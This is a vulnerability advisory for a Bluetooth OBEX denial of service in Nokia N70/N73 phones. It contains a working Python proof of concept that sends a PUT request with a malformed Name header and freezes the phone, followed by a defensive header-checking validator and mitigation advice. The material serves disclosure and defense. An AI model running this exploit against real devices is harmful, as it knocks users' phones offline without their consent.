
Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of Service




------------------------------------------------------------------
I. Summary

Nokia N70 and N73 are two popular models from Nokia's N-series lineup of 
smartphones. A flaw has been found in the OBEX implementation of these two 
models: it does not properly handle illegal characters in the Name header of a 
PUT request in an OBEX session. If exploited successfully, this causes a denial 
of service (phone lockup).

------------------------------------------------------------------
II. Description

According to the IrOBEX specification, certain path characters (i.e. ':', '/' 
and '\') are not allowed in the string of the Name header. However, the OBEX 
implementation in the N70/N73, and possibly other models, fails to handle 
violations of this rule. If the Name string consists of one of the following 
Unicode characters: 

        0x0009 (Tab)
        0x000a (Line feed)
        0x000b (Vertical tab)
        0x000c (Form feed)
        0x000d (Carriage return)
        0x003a (':')
        0x005c ('\')

the Bluetooth stack crashes and the phone freezes. Note that to exploit this, 
the attacker first has to pair with the victim phone. The vulnerability is 
illustrated by the following Python code (requires the PyBluez package; tested 
under Python 2.5.2 and PyBluez 0.15 with the Microsoft Bluetooth stack from 
Windows XP SP2):

# PoC code to demonstrate the flaw in the OBEX implementation of Nokia phones
# Tested under Windows XP SP2
# Coded by the penetration test team Of NCNIPC (China)

# PyBluez is required to run the code
import binascii
import sys
from bluetooth import *

# Bluetooth address and OBEX channel of the target device
# Replace them with the appropriate values for your device
target = ("00:15:A0:F9:E6:03", 10)

# Make a connection
sock = BluetoothSocket(RFCOMM)
sock.connect(target)

# Connect to the OBEX service
connect_pkg = "\x80\x00\x07\x10\x00\xff\xfe"
sock.send(connect_pkg)
con_recv=sock.recv(20)

if con_recv[0]=='\xa0':
    # Now we are connected

    # The name string that consists of a single 0x0009 character, which will
    # cause the phone to lock up
    name_str = "\x00\x09"
    
    # Construct and send the malformed packet
    name_header = "\x01\x00" + chr(len(name_str) + 5) + name_str + "\x00\x00"
    body_header = \
"\x49\x00\xa0\x42\x45\x47\x49\x4e\x3a\x56\x43\x41\x52\x44\x0d\x0a\x56\x45\x52\x53\x49\x4f\x4e\x3a\x32\x2e\x31\x0d\x0a\x4e\x3b\x45\x4e\x43\x4f\x44\x49\x4e\x47\x3d\x38\x42\x49\x54\x3b\x43\x48\x41\x52\x53\x45\x54\x3d\x55\x54\x46\x2d\x38\x3a\x42\x6c\x6f\x67\x67\x73\x3b\x4a\x6f\x65\x0d\x0a\x54\x45\x4c\x3b\x50\x52\x45\x46\x3b\x43\x45\x4c\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x54\x45\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x45\x4d\x41\x49\x4c\x3a\x72\x6f\x6f\x74\x40\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x0d\x0a\x45\x4e\x44\x3a\x56\x43\x41\x52\x44\x0d\x0a"
    put_pkg = "\x82\x00" + chr(len(name_header) + len(body_header) + 3) + \
name_header + body_header
    print "Packet dump: ", binascii.b2a_hex(put_pkg)
    sock.send(put_pkg)
    print "Packet sent"

    try:
        resp = sock.recv(20)
        print "Response dump: %s" %(binascii.b2a_hex(resp))
    except:
        print "Failed to receive response: ", sys.exc_info()[0]
    
    sock.close()
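
Added example (not part of the original advisory, and not Nokia's code): a receiver-side check, in Python 3, that walks the headers of an OBEX PUT request and reports any Name characters from the list above, plus '/', before the name is used. The function names and the two sample packets are constructed for illustration.

```python
import struct

# Code points the advisory lists, plus '/' (0x2F), which it says IrOBEX
# also disallows in a Name header. All names here are illustrative assumptions.
FORBIDDEN = {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x2F, 0x3A, 0x5C}
NAME_HI = 0x01  # header identifier of the Name header

# Constructed sample PUT requests (opcode 0x82): Name header + End-of-Body "hi".
BAD_PUT = bytes.fromhex("82 000f 01 0007 0009 0000 49 0005 6869")  # Name = U+0009
GOOD_PUT = bytes.fromhex(  # Name = "a.vcf"
    "82 0017 01 000f 0061 002e 0076 0063 0066 0000 49 0005 6869")

def parse_headers(packet):
    """Yield (header_id, value) from a request with a 3-byte opcode+length prefix."""
    if len(packet) < 3 or struct.unpack(">H", packet[1:3])[0] != len(packet):
        raise ValueError("packet length field does not match data")
    pos, end = 3, len(packet)
    while pos < end:
        hi = packet[pos]
        kind = hi >> 6  # top two bits select the header encoding
        if kind in (0, 1):  # length-prefixed: Unicode text or byte sequence
            if pos + 3 > end:
                raise ValueError("truncated header")
            hlen = struct.unpack(">H", packet[pos + 1:pos + 3])[0]
            if hlen < 3:
                raise ValueError("header length too small")
        else:  # fixed size: 1-byte or 4-byte value
            hlen = 2 if kind == 2 else 5
        if pos + hlen > end:
            raise ValueError("header runs past end of packet")
        yield hi, packet[pos + (3 if kind < 2 else 1):pos + hlen]
        pos += hlen

def bad_name_chars(packet):
    """Return the sorted forbidden code points found in any Name header."""
    found = set()
    for hi, value in parse_headers(packet):
        if hi != NAME_HI:
            continue
        if len(value) % 2:
            raise ValueError("Name is not whole UTF-16 code units")
        name = value.decode("utf-16-be").rstrip("\x00")
        found.update(ord(c) for c in name if ord(c) in FORBIDDEN)
    return sorted(found)

if __name__ == "__main__":
    for label, pkt in (("bad", BAD_PUT), ("good", GOOD_PUT)):
        print(label, [hex(c) for c in bad_name_chars(pkt)])
```

A receiver would answer a request with a non-empty result or a ValueError with an error response instead of passing the name on to the file-handling code.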

------------------------------------------------------------------
III. Impact

Denial of service: the phone freezes and loses responsiveness. The only way 
to make it function normally again is to take out the battery, reinstall it and 
power on the phone.

------------------------------------------------------------------
IV. Affected

Nokia N70 and N73. Other phone models may also be affected due to code reuse.

------------------------------------------------------------------
V. Solution

Don't pair with suspicious Bluetooth devices. Disable Bluetooth if necessary.

------------------------------------------------------------------
VI. Credit

The penetration test team Of NCNIPC (China) is credited for this vulnerability.